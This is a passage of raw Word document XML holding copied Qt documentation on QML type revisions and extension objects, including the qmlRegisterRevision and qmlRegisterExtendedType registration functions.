          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> reason)</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For example, if</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BaseType</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is changed and now has a revision 1, you can specify that your type uses the new revision:</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ln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qmlRegisterRevision</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BaseType</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;(</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"MyTypes"</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8B0A55">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>This is useful when deriving from base classes provided by other authors, e.g. when extending classes from the Qt Quick module</w:t>
      </w:r>
      <w:r w:rsidRPr="008B0A55">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA77C2" w:rsidRPr="00DA77C2" w:rsidRDefault="00DA77C2" w:rsidP="008B0A55">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="279" w:name="registering-extension-objects"/>
      <w:bookmarkStart w:id="280" w:name="_Toc483000591"/>
      <w:bookmarkStart w:id="281" w:name="_Toc483003611"/>
      <w:bookmarkStart w:id="282" w:name="_Toc483603944"/>
      <w:bookmarkStart w:id="283" w:name="_Toc483605164"/>
      <w:bookmarkEnd w:id="279"/>
      <w:r w:rsidRPr="008B0A55">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Registering Extension Objects</w:t>
      </w:r>
      <w:bookmarkEnd w:id="280"/>
      <w:bookmarkEnd w:id="281"/>
      <w:bookmarkEnd w:id="282"/>
      <w:bookmarkEnd w:id="283"/>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653106">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>When integrating existing classes and technology into QML, APIs will often need tweaking to fit better into the declarative environment</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Although the </w:t>
      </w:r>
      <w:r w:rsidRPr="00653106">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>best results</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> are usually obtained by </w:t>
      </w:r>
      <w:r w:rsidRPr="00653106">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>modifying the original classes directly</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00653106">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if this is either not possible or is complicated by some other concerns</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3AA1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">extension objects </w:t>
      </w:r>
      <w:r w:rsidRPr="00653106">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>allow limited extension</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> possibilities without direct modifications.</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FC3AA1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Extension objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3AA1">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3AA1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>add additional properties to an existing type</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Extension objects can </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3AA1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>only add properties</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, not signals or methods. An extended type definition allows the programmer to supply an additional type, known as the</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3AA1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>extension type</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, when registering the class. The properties are transparently merged with the original target class when used from within QML. For </w:t>
      </w:r>
      <w:r w:rsidRPr="00653106">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>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QLineEdit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leftMargin</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20</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leftMargin</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property is a new property added to an existing C++ type,</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId236" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QLineEdit</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, without modifying its source code.</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The</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId237" w:anchor="qmlRegisterExtendedType" w:history="1">
        <w:r w:rsidRPr="00FC3AA1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qmlRegisterExtendedType</w:t>
        </w:r>
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>()</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>function is for registering extended types. Note that it has two forms.</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keyword"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>template</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="operator"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>typename</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> T</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keyword"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>typename</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ExtendedT</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="operator"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;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qmlRegisterExtendedType(</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>const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char</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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uri</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versionMajor</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versionMinor</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keyword"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>const</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char</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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qmlName)</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keyword"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>template</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="operator"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>typename</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> T</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="operator"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="keyword"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>typename</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ExtendedT</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="operator"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;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type"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> qmlRegisterExtendedType()</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This functions should be used instead of the regular</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qmlRegisterType()</w:t>
      </w:r>
      <w:r w:rsidR="00653106">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">variations. The arguments are identical to the corresponding non-extension registration functions, except for the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3AA1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ExtendedT</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter which is the type of the extension object.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An extension class is a regular</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId238" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, with a constructor that takes a</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId239" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
